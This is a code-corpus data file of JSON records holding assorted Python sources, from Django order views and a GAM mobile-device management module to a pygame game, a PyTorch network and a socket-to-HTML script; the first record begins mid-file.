Order.objects.filter(account=request.user, is_display=True).order_by('-date_time', '-pk')\n paginator = Paginator(order_list, page_size)\n try:\n order_list = paginator.page(page)\n page_list = 0\n page_range = generate_pagination(page, paginator.num_pages)\n except PageNotAnInteger:\n order_list = paginator.page(1)\n except EmptyPage:\n order_list = paginator.page(paginator.num_pages)\n return render_to_response(\"order_list.html\", locals(), context_instance=RequestContext(request))\n\n\n@login_required\ndef order_details(request, pk):\n title = _(u'我的订单')\n order = get_object_or_404(Order, account=request.user, pk=pk, is_display=True)\n use_points = order.need_pay - order.amount\n return render_to_response(\"order_details.html\", locals(), context_instance=RequestContext(request))\n\n\n@login_required\ndef order_cancel(request, pk):\n order = get_object_or_404(Order, account=request.user, pk=pk, status=u'已保存', is_display=True)\n order.status = u'主动取消'\n order.save()\n return redirect('order_details', pk)\n\n\nfrom django.db.models import Q\n@login_required\ndef order_delete(request, pk):\n order = get_object_or_404(Order, Q(status=u'已取消') | Q(status=u'主动取消') | Q(status=u'已完成交易'), account=request.user, pk=pk)\n order.is_display = False\n order.save()\n return redirect('order_list')\n\n\n@permission_required('orders.change_order')\ndef order_print(request, pk):\n order = get_object_or_404(Order, pk=pk)\n use_points = order.use_points * 0.01\n return render_to_response(\"order_print.html\", locals(), context_instance=RequestContext(request))\n\n\n@permission_required('orders.change_order')\ndef order_adminedit(request, pk):\n with transaction.commit_on_success():\n order = get_object_or_404(Order, pk=pk, is_locked=False)\n #return HttpResponse(order.need_pay)\n if request.method == 'POST':\n post_form = OrderProductsEditForm(data=request.POST)\n if post_form.is_valid():\n pid = post_form.cleaned_data['pid']\n count = post_form.cleaned_data['count']\n obj = order.products.get(product_id=pid)\n #使用点数超过总价的话,返还点数\n sum_price = Decimal(0)\n #获取总价\n use_points_offset = 0\n use_points = order.use_points\n for i in order.products.all():\n if i.product_id == pid:\n i.product_count = count\n i.save()\n sum_price += i.product_count * Decimal(i.product_price)\n #使用点数大于总价,重新计算实付,并返还差额点数\n if use_points * 0.01 > sum_price:\n use_points_offset = use_points - float(sum_price) / 0.01\n use_points = float(sum_price) / 0.01\n order.use_points = use_points\n order.need_pay = sum_price - Decimal((use_points * 0.01).__str__())\n try:\n profile = UserProfile.objects.get(user=request.user)\n profile.points += use_points_offset\n profile.save()\n except UserProfile.DoesNotExist:\n pass\n order.amount = sum_price\n order.save()\n #刷新父页面标志\n is_changed = True\n #return redirect('order_adminedit', pk)\n else:\n return HttpResponse('aaa')\n product_forms = []\n for p in order.products.all().order_by('product_id'):\n product_forms.append(OrderProductsEditForm(initial={'pid': p.product_id, 'count': p.product_count, 'name': p.product_name, 'order_id': order.pk}))\n return render_to_response(\"order_adminedit.html\", locals(), context_instance=RequestContext(request))","sub_path":"apps/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"439453998","text":"class Solution(object):\n def findStrobogrammatic(self, n):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n #pair can't begin with 0\n #if n is even: we need to generate n/2 pairs\n #if n is odd, we need to generate n/2 pairs, and one from [0,1,8]\n if n == 0:\n return []\n if n == 1:\n return ['0','8','1']\n \n sysmetric = ['0','8','1']\n cand = ['0','1','6','9','8']\n Mirror = {\n '0':'0',\n '1':'1',\n '6':'9',\n '8':'8',\n '9':'6'\n }\n #generate length = n/2 sub-array \n res = []\n def dfs_generate(path,length):\n if len(path) == length:\n res.append(path)\n return\n if len(path) == 0:\n for c in cand[1:]:\n dfs_generate(path+[c],length)\n else:\n for c in cand:\n dfs_generate(path+[c],length)\n dfs_generate([],n/2)\n \n \n #check, if odd, add addition one\n if n%2 == 1:\n temp = []\n for k in range(len(res)):\n for c in sysmetric:\n temp.append(res[k]+[c])\n res = temp\n \n #generate \n StrobogrammaticNumbers = []\n for k in range(len(res)):\n for i in range(1,n/2+1):\n res[k].append(Mirror[res[k][n/2-i]])\n StrobogrammaticNumbers.append(\"\".join(res[k]))\n \n \n return StrobogrammaticNumbers\n","sub_path":"Strobogrammatic-Number-II.py","file_name":"Strobogrammatic-Number-II.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"85606535","text":"from ..core.database import database\nfrom ..core.language.names import extract_first_name, first_name_gender\n\ndef copy_tweets_to_analyse():\n\t\"\"\"Copies all tweets into a new database table for manipulation\"\"\"\n\tfor tweet in database.get_tweets():\n\t\tuser = tweet.user\n\t\ttext = tweet.text\n\t\thashtags = tweet.hashtags\n\t\tsearch_topic = tweet.search_topic\n\n\t\tdatabase.add_tweet_analysis(user, text, hashtags, str(None), search_topic)\n\ndef all_tweets_gender():\n\tfor tweet in database.get_tweets_analysis():\n\t\tuser = tweet.user\n\t\tfirst_name = extract_first_name(user)\n\n\t\tif first_name: \n\t\t\tgender = first_name_gender(first_name)[first_name]\n\n\t\telse: \n\t\t\tgender = str(None)\n\n\t\ttweet.gender = gender\n\t\tdatabase.commit()\n\n\t\tprint('--------')\n\t\tprint(tweet.user)\n\t\tprint(first_name)\n\t\tprint(gender)\n\t\tprint('--------')","sub_path":"twittermining/election/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"568176879","text":"\"\"\"\nMethods that execute specific queries against the SQLite database for the CONDITIONS table.\nThis supports the policy_sentry query functionality\n\"\"\"\nfrom sqlalchemy import and_\nfrom policy_sentry.shared.database import ConditionTable\n\n\n# Per service\ndef get_condition_keys_for_service(db_session, service):\n \"\"\"Get a list of available conditions per AWS service\"\"\"\n results = []\n rows = db_session.query(ConditionTable.condition_key_name, ConditionTable.condition_value_type,\n ConditionTable.description).filter(ConditionTable.service.like(service))\n for row in rows:\n results.append(str(row.condition_key_name))\n return results\n\n\n# Per condition key name\ndef get_condition_key_details(db_session, service, condition_key_name):\n \"\"\"Get details about a specific condition key in JSON format\"\"\"\n rows = db_session.query(ConditionTable.condition_key_name, ConditionTable.condition_value_type,\n ConditionTable.description).filter(and_(ConditionTable.condition_key_name.like(condition_key_name), ConditionTable.service.like(service)))\n result = rows.first()\n output = {\n 'name': result.condition_key_name,\n 'description': result.description,\n 'condition_value_type': result.condition_value_type\n }\n return output\n","sub_path":"policy_sentry/querying/conditions.py","file_name":"conditions.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"631015045","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nPractica 3\n\"\"\"\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\n\n\"\"\"\nCreamos clase\n\"\"\"\n\n\nclass SmallSMILHandler(ContentHandler):\n \"\"\"\n Inicializamos.\n \"\"\"\n def __init__(self):\n self.lista = []\n self.dic = {'root-layout': ['width', 'height', 'background-color'],\n 'region': ['id', 'top', 'bottom', 'left', 'right'],\n 'img': ['src', 'region', 'begin', 'dur'],\n 'audio': ['src', 'begin', 'dur'],\n 'textstream': ['src', 'region']}\n \"\"\"\n El parsel lo llama cuando encuentra la etiqueta.\n \"\"\"\n def startElement(self, name, attrs):\n if name in self.dic:\n self.atributos = {}\n for item in self.dic[name]:\n self.atributos[item] = attrs.get(item, \"\")\n self.crear_lista(name, self.atributos)\n\n \"\"\"\n Devuelve la lista con las etiquetas encontradas\n \"\"\"\n def get_tags(self):\n return self.lista\n\n \"\"\"\n Creamos una lista segun lo que va encontrando\n \"\"\"\n def crear_lista(self, nombre, atributos):\n etiqueta = []\n etiqueta.append(nombre)\n etiqueta.append(atributos)\n self.lista.append(etiqueta)\n return self.lista\n\n\n\"\"\"\nPara que imprima la lista\n\"\"\"\n\n\ndef print_list(list):\n for element in list:\n print (element)\n\n\nif __name__ == \"__main__\":\n parser = make_parser()\n cHandler = SmallSMILHandler()\n parser.setContentHandler(cHandler)\n parser.parse(open('karaoke.smil'))\n print_list(cHandler.get_tags())\n","sub_path":"smallsmilhandler.py","file_name":"smallsmilhandler.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129669757","text":"import sys\n\nimport pygame as pygame\nfrom pygame.sprite import Group\n\nfrom game.main.gun.hurt import judge_bullet_group\nfrom game.main.monster.bullet_monster import BulletMonster\nfrom game.main.monster.death_monster import DeathMonster\nfrom game.main.person.person import Person\nfrom game.main.prop.check_events import check_event\nfrom game.main.prop.settings import Settings\n\n\ndef run_game():\n pygame.init()\n ai_setting = Settings()\n screen = pygame.display.set_mode((ai_setting.scree_width, ai_setting.scree_height))\n pygame.display.set_caption(\"new game\")\n people = Person(screen)\n hero_bullets = Group()\n monster_group = Group()\n monster_bullets = Group()\n add_monster(monster_group, people, screen, ai_setting)\n while True:\n screen.fill(ai_setting.bg_color)\n check_event(people, hero_bullets)\n people.move()\n blit_flush_hero(people, hero_bullets)\n bit_flush_monster(monster_group, monster_bullets)\n if not judge_bullet_group(monster_bullets, people):\n \"\"\"目前默认hero死亡直接退出\"\"\"\n sys.exit()\n judge_bullet_group(hero_bullets, monster_group)\n for bullet in hero_bullets.copy():\n if bullet.rect.centerx <= 0 or bullet.rect.centery <= 0:\n hero_bullets.remove(bullet)\n for bullet in monster_bullets.copy():\n if bullet.rect.centerx <= 0 or bullet.rect.centery <= 0:\n monster_bullets.remove(bullet)\n pygame.display.flip()\n\n\ndef add_monster(monster_group, hero, screen, setting):\n i = 0\n while i < 2:\n bullet_monster = BulletMonster(hero, screen, setting)\n monster_group.add(bullet_monster)\n i += 1\n death_monster = DeathMonster(hero, screen, setting)\n monster_group.add(death_monster)\n\n\ndef blit_flush_hero(people, hero_bullets):\n people.blitme()\n for bullet in hero_bullets:\n bullet.draw_bullet()\n\n\ndef bit_flush_monster(monster_group, monster_bullets):\n for monster in monster_group:\n monster.monster_action(monster_bullets)\n monster.draw()\n for bullet in monster_bullets:\n bullet.draw_bullet()\n\n\nrun_game()\n","sub_path":"game/main/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"16532933","text":"import pandas as pd\nimport datetime\nimport re\nimport os\nimport csv\nfrom reftypes import db\n\n\ndef check_db(base, val):\n\n # Check validity of base and scores values\n if not base in db.keys():\n raise KeyError(\"Citation database not recognised. Supported values are 'wos' (Web of Science) and 'scopus' (Scopus).\")\n # Check validity of base and scores values\n if not val in db[base].keys():\n raise KeyError(\"Scores value not recognised. Supported values are 'so' (source), 'pu' (publisher) and 'py' (year).\")\n\ndef get_input(user_input, all_files):\n\n # Check if USER_INPUT is a valid path\n if not os.path.exists(user_input):\n raise FileNotFoundError('Input path not found. Please check the USER_INPUT variable.')\n \n # Check if USER_INPUT is a folder or a file\n if os.path.isdir(user_input):\n \n # Build list of file paths\n files = [os.path.join(user_input, f) for f in os.listdir(user_input)]\n \n # Ask whether to include individual files - else include entire folder\n if not all_files:\n select_files = []\n for f in files:\n print('Add {} to analysis? (y/n)'.format(f))\n response = input()\n if response.lower() in ['y', 'yes']:\n select_files.append(f)\n print('{} added.'.format(f))\n else:\n print('{} not added.'.format(f))\n continue\n return select_files\n else:\n print('All files added to analysis.')\n return files\n else:\n # Return path to file as single element list\n return [user_input]\n\ndef create_df(files, base, val):\n print('Creating DataFrame...')\n # Setup database parameters from reftypes.py\n separator = db[base]['sep']\n code = db[base]['enc']\n title = db[base]['ti']\n abstract = db[base]['ab']\n quote = db[base]['quote']\n \n # Create empty DataFrame and append each file\n df = pd.DataFrame()\n \n # Special case for ProQuest XLS-format\n if base == 'proquest':\n for f in files:\n add_file = pd.read_excel(f, index_col=False, usecols=[title, abstract, val])\n df = df.append(add_file)\n else:\n for f in files:\n add_file = pd.read_csv(f, sep=separator, encoding=code, index_col=False, usecols=[title, abstract, val], quoting=quote)\n df = df.append(add_file)\n return df\n\ndef scores_df(df, val):\n print('Creating scores table...')\n val_list = df[val].fillna('N/A')\n val_list.reset_index(drop=True, inplace=True)\n \n # Create list of unique values\n values = sorted(list(val_list.unique()))\n values = set([str(i).lower() for i in values])\n \n # Create DataFrame with a binary table of scores\n scores = pd.DataFrame(columns=values, index=val_list.index).fillna(0)\n \n # Populate each row of the binary table\n for i, val in enumerate(val_list):\n scores[str(val).lower()][i] = 1\n \n return scores\n\ndef format_header(scores):\n print('Formatting header...')\n # Remove illegal characters from column names with regular expression:\n scores.columns = [re.sub('[\\[\\]<>_]', '', col) for col in scores.columns]\n \n scores = scores.sort_index(axis=1)\n \n # Convert to VOSviewer scores header format:\n scores.columns = ['score<{}>'.format(col) for col in scores.columns]\n \n return scores\n\ndef scores_file(scores, val, output_path, debugging):\n print('Creating scores file...')\n # Setup output values\n val = val.replace(' ', '_')\n sep_val = '\\t'\n \n output_name = '{}_{}_scores.txt'.format(output_path, val)\n if os.path.exists(output_name):\n raise Exception('File already exists. Change OUTPUT_NAME and try again.')\n if not debugging:\n scores.to_csv(path_or_buf=output_name, sep=sep_val, index=False)\n\ndef corpus_file(df, base, output_path, debugging):\n print('Creating corpus file...')\n # Setup output values\n sep_val = '\\t'\n output_name = '{}_corpus.txt'.format(output_path)\n\n # Get N/A data for summary and clean output\n abstract_na = df[db[base]['ab']].isna().sum()\n df[db[base]['ab']] = df[db[base]['ab']].fillna('-')\n corpus = pd.DataFrame(df[db[base]['ti']] + ' ' + df[db[base]['ab']])\n if os.path.exists(output_name):\n raise Exception('File already exists. Change OUTPUT_NAME and try again.\\nNote: corpus files can be re-used with different scores files from the same data set.')\n if not debugging:\n corpus.to_csv(path_or_buf=output_name, sep=sep_val, index=False, header=False)\n\n # Return number of missing abstracts for summary()\n return int(abstract_na)\n\ndef check_output(output_path):\n if not os.path.exists(output_path):\n print('Output directory not found. Creating path...')\n os.makedirs(output_path)\n\ndef summary(scores_df, time_elapsed, abstract_na):\n if type(abstract_na) == int:\n abstract_pct = '{:.2%}'.format(abstract_na / len(scores_df))\n else:\n abstract_pct = 'N/A'\n print( \"\"\"\\n*** SUMMARY *** \\nNumber of scores values: {}\\nNumber of references: {}\\nAbstracts not available: {} ({})\\nTime elapsed: {}\"\"\"\\\n .format(len(scores_df.columns), len(scores_df), abstract_na, abstract_pct, time_elapsed))\n\n### W.I.P. ###\ndef bucketise(y_series, interval):\n # Define the range of the buckets\n y_min = y_series.min()\n y_max = y_series.max()\n\n # Generate left-inclusiive list of buckets adjusted for first and last year\n y_list = [y for y in range(y_min - interval, y_max + interval + 1) if y % interval == 0]\n buckets = pd.cut(y_series, y_list, right=False)\n\n # TODO: Adjust right edge\n\n # Format output\n buckets = buckets.astype(str).str.strip('[)')\n buckets = buckets.str.replace(', ', '-')\n\n return buckets\n\ndef generate_files(user_input, output_name, path, val, base, all_files=False, skip=False, buckets=False, interval=5, debugging=False):\n\n # Set timer for summary()\n start_time = datetime.datetime.now()\n # Check user variables\n check_db(base, val)\n check_output(path)\n\n # Setup\n value = db[base][val]\n output_path = os.path.join(path, output_name)\n abstract_na = 'N/A'\n \n # Check input and generate DataFrame\n df = create_df(get_input(user_input, all_files), base, value)\n\n # Reset timer if the user has manually selected which files to include\n if not all_files:\n start_time = datetime.datetime.now()\n\n if buckets:\n # Check input bucket suitability\n if val == 'py':\n # Call bucketise() and assign return value to DataFrame\n years = df[value]\n value = 'buckets'\n df[value] = bucketise(years, interval)\n else:\n raise Exception('Bucketising only works for publication year (\"py\") - Please check VAL and BUCKETS.')\n \n scores = format_header(scores_df(df, value))\n\n scores_file(scores, value, output_path, debugging)\n\n if not skip:\n abstract_na = corpus_file(df, base, output_path, debugging)\n\n print('File creation successful.')\n\n # Calculate time elapsed.\n end_time = datetime.datetime.now()\n time_elapsed = end_time - start_time\n\n # Generate summary of file creation\n summary(scores, time_elapsed, abstract_na)","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":7326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"30843328","text":"import logging\nimport requests\n\nimport streamlit as st\n\nlogging.basicConfig(format=\"%(asctime)s %(levelname)s: %(message)s\", level=logging.INFO)\nBASE_URL = \"https://swapi.dev/api/\"\n\n\ndef call(url):\n \"\"\"\n Faz uma chamada genérica pra API e trata possíveis erros.\n Em caso de sucesso, retorna um dicionário com a resposta.\n Em caso de falha, retorna um dicionário vazio.\n \"\"\"\n response = requests.get(url)\n # Tratamento de erros\n if response.status_code >= 400:\n logging.error(\"Erro ao chamar %s\", url)\n return {}\n\n return response.json()\n\n\ndef list_entity(entity):\n \"\"\"\n Lista uma determinada entidade\n\n >>> list(\"planets\")\n (...) # Lista com planetas\n \"\"\"\n return call(f\"{BASE_URL}{entity}/\").get(\"results\")\n\n\nplanets = list_entity(\"planets\")\n\nfor idx, planet in enumerate(planets):\n st.header(planet[\"name\"])\n\n if st.button(\"Ver população cadastrada\", key=idx):\n planet = call(planets[idx][\"url\"])\n st.text(\n f\"O planeta {planet['name']} tem {len(planet['residents'])} moradores cadastrados\"\n )\n\n st.markdown(\"---\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"591450769","text":"import sys\nimport uuid\n\nimport gam\nfrom gam.var import *\nfrom gam import controlflow\nfrom gam import display\nfrom gam import gapi\nfrom gam.gapi import directory as gapi_directory\nfrom gam import utils\n\n\ndef delete():\n cd = gapi_directory.build()\n resourceId = sys.argv[3]\n gapi.call(cd.mobiledevices(),\n 'delete',\n resourceId=resourceId,\n customerId=GC_Values[GC_CUSTOMER_ID])\n\n\n\ndef info():\n cd = gapi_directory.build()\n resourceId = sys.argv[3]\n device_info = gapi.call(cd.mobiledevices(),\n 'get',\n customerId=GC_Values[GC_CUSTOMER_ID],\n resourceId=resourceId)\n if 'deviceId' in device_info:\n device_info['deviceId'] = device_info['deviceId'].encode('unicode-escape').decode(\n UTF8)\n attrib = 'securityPatchLevel'\n if attrib in device_info and int(device_info[attrib]):\n device_info[attrib] = utils.formatTimestampYMDHMS(device_info[attrib])\n display.print_json(device_info)\n\n\n\ndef print_():\n cd = gapi_directory.build()\n todrive = False\n titles = []\n csvRows = []\n fields = None\n projection = orderBy = sortOrder = None\n queries = [None]\n delimiter = ' '\n listLimit = 1\n appsLimit = -1\n i = 3\n while i < len(sys.argv):\n myarg = sys.argv[i].lower().replace('_', '')\n if myarg == 'todrive':\n todrive = True\n i += 1\n elif myarg in ['query', 'queries']:\n queries = gam.getQueries(myarg, sys.argv[i + 1])\n i += 2\n elif myarg == 'delimiter':\n delimiter = sys.argv[i + 1]\n i += 2\n elif myarg == 'listlimit':\n listLimit = gam.getInteger(sys.argv[i + 1], myarg, minVal=-1)\n i += 2\n elif myarg == 'appslimit':\n appsLimit = gam.getInteger(sys.argv[i + 1], myarg, minVal=-1)\n i += 2\n elif myarg == 'fields':\n fields = f'nextPageToken,mobiledevices({sys.argv[i+1]})'\n i += 2\n elif myarg == 'orderby':\n orderBy = sys.argv[i + 1].lower()\n validOrderBy = [\n 'deviceid', 'email', 'lastsync', 'model', 'name', 'os',\n 'status', 'type'\n ]\n if orderBy not in validOrderBy:\n controlflow.expected_argument_exit('orderby',\n ', '.join(validOrderBy),\n orderBy)\n if orderBy == 'lastsync':\n orderBy = 'lastSync'\n elif orderBy == 'deviceid':\n orderBy = 'deviceId'\n i += 2\n elif myarg in SORTORDER_CHOICES_MAP:\n sortOrder = SORTORDER_CHOICES_MAP[myarg]\n i += 1\n elif myarg in PROJECTION_CHOICES_MAP:\n projection = PROJECTION_CHOICES_MAP[myarg]\n i += 1\n else:\n controlflow.invalid_argument_exit(sys.argv[i], 'gam print mobile')\n for query in queries:\n gam.printGettingAllItems('Mobile Devices', query)\n page_message = gapi.got_total_items_msg('Mobile Devices', '...\\n')\n all_mobile = gapi.get_all_pages(cd.mobiledevices(),\n 'list',\n 'mobiledevices',\n page_message=page_message,\n customerId=GC_Values[GC_CUSTOMER_ID],\n query=query,\n projection=projection,\n fields=fields,\n orderBy=orderBy,\n sortOrder=sortOrder)\n for mobile in all_mobile:\n row = {}\n for attrib in mobile:\n if attrib in ['kind', 'etag']:\n continue\n if attrib in ['name', 'email', 'otherAccountsInfo']:\n if attrib not in titles:\n titles.append(attrib)\n if listLimit > 0:\n row[attrib] = delimiter.join(\n mobile[attrib][0:listLimit])\n elif listLimit == 0:\n row[attrib] = delimiter.join(mobile[attrib])\n elif attrib == 'applications':\n if appsLimit >= 0:\n if attrib not in titles:\n titles.append(attrib)\n applications = []\n j = 0\n for app in mobile[attrib]:\n j += 1\n if appsLimit and (j > appsLimit):\n break\n appDetails = []\n for field in [\n 'displayName', 'packageName', 'versionName'\n ]:\n appDetails.append(app.get(field, ''))\n appDetails.append(\n str(app.get('versionCode', '')))\n permissions = app.get('permission', [])\n if permissions:\n appDetails.append('/'.join(permissions))\n else:\n appDetails.append('')\n applications.append('-'.join(appDetails))\n row[attrib] = delimiter.join(applications)\n else:\n if attrib not in titles:\n titles.append(attrib)\n if attrib == 'deviceId':\n row[attrib] = mobile[attrib].encode(\n 'unicode-escape').decode(UTF8)\n elif attrib == 'securityPatchLevel' and int(mobile[attrib]):\n row[attrib] = utils.formatTimestampYMDHMS(\n mobile[attrib])\n else:\n row[attrib] = mobile[attrib]\n csvRows.append(row)\n display.sort_csv_titles(\n ['resourceId', 'deviceId', 'serialNumber', 'name', 'email', 'status'],\n titles)\n display.write_csv_file(csvRows, titles, 'Mobile', todrive)\n\n\ndef update():\n cd = gapi_directory.build()\n resourceIds = sys.argv[3]\n match_users = None\n doit = False\n if resourceIds[:6] == 'query:':\n query = resourceIds[6:]\n fields = 'nextPageToken,mobiledevices(resourceId,email)'\n page_message = gapi.got_total_items_msg('Mobile Devices', '...\\n')\n devices = gapi.get_all_pages(cd.mobiledevices(),\n 'list',\n page_message=page_message,\n customerId=GC_Values[GC_CUSTOMER_ID],\n items='mobiledevices',\n query=query,\n fields=fields)\n else:\n devices = [{'resourceId': resourceIds, 'email': ['not set']}]\n doit = True\n i = 4\n body = {}\n while i < len(sys.argv):\n myarg = sys.argv[i].lower().replace('_', '')\n if myarg == 'action':\n body['action'] = sys.argv[i + 1].lower()\n validActions = [\n 'wipe', 'wipeaccount', 'accountwipe', 'wipe_account',\n 'account_wipe', 'approve', 'block',\n 'cancel_remote_wipe_then_activate',\n 'cancel_remote_wipe_then_block'\n ]\n if body['action'] not in validActions:\n controlflow.expected_argument_exit('action',\n ', '.join(validActions),\n body['action'])\n if body['action'] == 'wipe':\n body['action'] = 'admin_remote_wipe'\n elif body['action'].replace('_',\n '') in ['accountwipe', 'wipeaccount']:\n body['action'] = 'admin_account_wipe'\n i += 2\n elif myarg in ['ifusers', 'matchusers']:\n match_users = gam.getUsersToModify(entity_type=sys.argv[i + 1].lower(),\n entity=sys.argv[i + 2])\n i += 3\n elif myarg == 'doit':\n doit = True\n i += 1\n else:\n controlflow.invalid_argument_exit(sys.argv[i], 'gam update mobile')\n if body:\n if doit:\n print(f'Updating {len(devices)} devices')\n describe_as = 'Performing'\n else:\n print(\n f'Showing {len(devices)} changes that would be made, not actually making changes because doit argument not specified'\n )\n describe_as = 'Would perform'\n for device in devices:\n device_user = device.get('email', [''])[0]\n if match_users and device_user not in match_users:\n print(\n f'Skipping device for user {device_user} that did not match match_users argument'\n )\n else:\n print(\n f'{describe_as} {body[\"action\"]} on user {device_user} device {device[\"resourceId\"]}'\n )\n if doit:\n gapi.call(cd.mobiledevices(),\n 'action',\n resourceId=device['resourceId'],\n body=body,\n customerId=GC_Values[GC_CUSTOMER_ID])\n","sub_path":"src/gam/gapi/directory/mobiledevices.py","file_name":"mobiledevices.py","file_ext":"py","file_size_in_byte":9693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"528209738","text":"import socket\nimport collector\nimport string\nfrom selenium import webdriver\n\n\nsock=socket.socket()\nsock.bind(('',9090))\nsock.listen(1)\nconn, addr = sock.accept()\n\nprint('connected:', addr)\n\na=1\nwhile a==1:\n data = conn.recv(1024)\n print(\"Data:\",data)\n if data:\n a=0\n conn.send(data)\n\ninfonew = data.decode('utf-8')\n\n\na = infonew.split() \nos=a[0]\nmemory=a[1]\nuname=a[2]\n\nsop=\"\"\"\n\n\n\n\nDATA\n\n\n\n\"\"\"\n\nscl=\"\"\"\n \n\n\"\"\"\n\ntab1=\"\"\ntab2=\"\"\ntab3=\"\"\n\nout = open(r'C:\\xampp\\htdocs\\E\\index.html', 'w')\nout.write(sop)\nout.write(tab1)\nout.write(tab2)\nout.write(tab3)\nout.write(scl)\nout.close()\n\ndriver=webdriver.Chrome()\ndriver.get(\"http://localhost/e/index.html\")\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"590509842","text":"import torch\n\n\nclass Network(torch.nn.Module):\n def __init__(self, max_num_enemies):\n super(Network, self).__init__()\n self.n_inputs = max_num_enemies * 2 + 1\n self.n_hidden_1 = 10 * self.n_inputs\n self.n_hidden_2 = 5 * self.n_inputs\n self.n_outputs = 2\n self.fc1 = torch.nn.Linear(self.n_inputs, self.n_hidden_1)\n self.ac1 = torch.nn.Sigmoid()\n self.fc2 = torch.nn.Linear(self.n_hidden_1, self.n_hidden_2)\n self.ac2 = torch.nn.Sigmoid()\n self.fc3 = torch.nn.Linear(self.n_hidden_2, self.n_outputs)\n self.ac3 = torch.nn.Sigmoid()\n self.layers = [self.fc1, self.fc2, self.fc3]\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.ac1(x)\n x = self.fc2(x)\n x = self.ac2(x)\n x = self.fc3(x)\n x = self.ac3(x)\n return x\n\n def get_structure(self):\n return self.n_inputs, self.n_hidden_1, self.n_hidden_2, \\\n self.n_outputs, len(self.layers)\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"16100888","text":"from .celery import app\nimport sys\n\n# Add the smrt_service package folder path to the sys.path list\nsys.path.append('/var/web_service/supersmart/smrt_service/')\nimport db_task\n\ndef get_task_status(task_id):\n\ttask = app.AsyncResult(task_id)\n\t\n\tif task.state == 'PENDING':\n\t\t# job has not started yet\n\t\tresponse = {\n\t\t\t'job_state': task.state,\n\t\t\t'current_step': 0,\n\t\t\t'total_steps': 12,\n\t\t\t'status_code': 200,\n\t\t\t'job_status': 'job has not started yet..',\n 'message': \"Success\"\n\t\t}\n\telif task.state == 'PROGRESS': #custom state name\n\t\tresponse = {\n\t\t\t'tree_id': task.info['tree_id'], \n\t\t\t'current_step': task.info['current_step'],\n\t\t\t'total_steps': task.info['total_steps'], \n\t\t\t'job_state' : task.state,\n\t\t\t'status_code' : 200, \n\t\t\t'job_status' : task.info['status'],\n 'message': \"Success\" \n\t\t}\n\telse:\n\t\tresponse = {\n\t\t\t'total_steps': 12,\n\t\t\t'status_code': 200,\n 'message': \"Success\"\n\t\t} \n\t\ttree_id, job_status, cur_step, ex_time = db_task.query_jid_db(task_id)\n\t\tif tree_id is not None:\n\t\t\tif cur_step == 12:\n\t\t\t\tresponse['job_state'] = \"SUCCESS\"\n\t\t\t\tresponse['job_status'] = \"completed\"\n\t\t\t\tresponse['execution_time'] = ex_time\n\t\t\t\tresponse['tree_id'] = tree_id\n\t\t\telse:\n\t\t\t\tresponse['job_status'] = \"Error in step %d: %s\"%(cur_step+1, job_status)\n\t\t\t\tresponse['job_state'] = \"FAILURE\"\n\t\telse:\n\t\t\tresponse['status_code'] = 500\n\t\t\tresponse['message'] = \"Could not retrieve any status\"\n\t''' \n\telse:\n\t\t# something went wrong in the background job\n\t\tresponse = {\n\t\t\t'job_state': task.state,\n\t\t\t'current_step': 0,\n\t\t\t'status_code': 200,\n\t\t\t'total_steps': 12,\n\t\t\t'job_status': str(task.info), # this is the exception raised\n 'message': \"Success\" \n\t }\n\t#except KeyError, e: \n\t#\treturn {'job_state':\"Error: %s\"%str(e)}\n\t'''\n\n\treturn response\n\n","sub_path":"supersmart/smrt_service/task_status.py","file_name":"task_status.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"327516683","text":"#!/usr/bin/env python2\n\nimport os\nimport subprocess\n\nimport dbus\nimport gobject\nfrom dbus.mainloop.glib import DBusGMainLoop\n\n\ndbus_loop = DBusGMainLoop()\n\nbus = dbus.SystemBus(mainloop=dbus_loop)\nlogin1 = bus.get_object(\"org.freedesktop.login1\",\n \"/org/freedesktop/login1\")\nmanager = dbus.Interface(login1, 'org.freedesktop.login1.Manager')\n\ninhibited = None\n\n\ndef take_lock():\n global inhibited\n inhibited = manager.Inhibit(\"sleep\", \"i3lock\", \"lock screen\", \"delay\")\n\n\ndef release_lock():\n os.close(inhibited.take())\n\n\ndef prepare_for_sleep(active):\n if active:\n subprocess.check_call([os.path.expanduser('~/work/i3-utils/lock.py')])\n release_lock()\n else:\n take_lock()\n\n\ntake_lock()\n\nmanager.connect_to_signal('PrepareForSleep', prepare_for_sleep)\n\nloop = gobject.MainLoop()\nloop.run()\n","sub_path":"sleep-locker.py","file_name":"sleep-locker.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 